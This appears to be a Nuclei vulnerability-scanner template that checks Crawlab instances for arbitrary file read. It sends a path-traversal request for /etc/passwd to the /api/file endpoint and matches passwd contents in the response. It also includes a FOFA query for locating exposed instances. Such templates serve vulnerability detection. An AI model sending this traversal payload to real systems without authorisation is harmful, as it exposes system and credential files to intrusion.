id: crawlab-lfi

info:
  name: Crawlab - Arbitrary File Read
  author: pussycat0x
  severity: high
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Crawlab%20file%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="Crawlab"
  tags: Crawlab

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/file?path=../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "data\":\""
          - "error\":"
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100e91a48d8b24ffb5c1f46632a473da7e2290db76c765897e496a17b7e62cc70c3022100da94b93002666a87e135bd530ccfa54ae2977c4735c0b95cfc247a341176b9b7:922c64590222798bb761d5b6d8e72950
